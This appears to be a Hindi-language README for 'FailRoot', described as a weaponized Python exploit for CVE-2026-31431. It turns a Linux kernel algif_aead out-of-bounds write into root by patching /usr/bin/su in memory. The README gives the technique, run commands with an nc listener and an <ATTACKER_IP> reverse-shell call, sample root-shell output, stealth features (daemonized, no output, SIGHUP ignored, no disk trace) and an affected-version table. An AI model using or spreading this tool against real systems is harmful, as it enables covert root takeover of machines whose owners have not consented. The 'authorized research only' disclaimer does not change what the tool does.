
हथियारबंद Python एक्सप्लॉइट CVE-2026-31431 के लिए, Linux कर्नेल विशेषाधिकार वृद्धि को एक डेमॉनाइज़्ड रूट रिवर्स शेल के साथ जोड़ता है, जिसमें पूर्ण PTY शामिल है, और /usr/bin/su को मेमोरी में पैच करता है।
█▀▀ ▄▀█ █ █ █▀█ █▀█ █▀█ ▀█▀
█▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░
CVE-2026-31431 • Linux Kernel LPE → Root Reverse Shell
FailRoot एक हथियारबंद एक्सप्लॉइट है CVE-2026-31431 के लिए — लिनक्स कर्नेल के crypto: algif_aead सबसिस्टम में एक आउट-ऑफ-बाउंड राइट।
यह विशेषाधिकार वृद्धि को पूर्ण PTY के साथ डेमॉनाइज़्ड रूट रिवर्स शेल से जोड़ता है:
AF_ALG + splice() → 4-बाइट पेज-कैश राइट → /usr/bin/su पैच → root
पूरा एक्सप्लॉइट एक ही फ़ाइल में समाहित है। कोई कंपाइलेशन नहीं। कोई बाहरी निर्भरता नहीं। डिस्क पर कोई निशान नहीं — su बाइनरी केवल मेमोरी में पैच की जाती है।
algif_aead + authencesn कई फ़ॉलबैक रणनीतियों के माध्यम से/usr/bin/su पेज कैश में 4 नियंत्रित बाइट्स लिखता हैpty.spawn("/usr/bin/su") → पूर्णतः इंटरैक्टिव रूट TTYरिवर्स शेल टर्मिनल बंद होने पर भी बना रहता है (SIGHUP अनदेखा किया जाता है), टारगेट पर शून्य आउटपुट दिखाता है, और 3 मिनट तक रीट्राय के साथ कनेक्ट होता है।
# हमलावर — लिसनर शुरू करें:
nc -lvnp 4444
# टारगेट — एक्सप्लॉइट चलाएँ (कुछ भी नहीं दिखेगा, यह तुरंत डेमॉनाइज़ हो जाता है):
python3 exploit.py <ATTACKER_IP> 4444
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234
root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
os.splice())/usr/bin/su तक पढ़ने की पहुँच (सभी डिस्ट्रो पर वर्ल्ड-रीडेबल)algif_aead और authencesn उपलब्ध होंsudo आवश्यक नहींकेवल अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए। दुरुपयोग अवैध है।
| से | तक (अनन्य) |
|---|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170 |
| 6.2 | 6.6.137 |
| 6.7 | 6.12.85 |
| 6.13 | 6.18.22 |
| 6.19 | 6.19.12 |
| 7.0 | rc1–rc6 |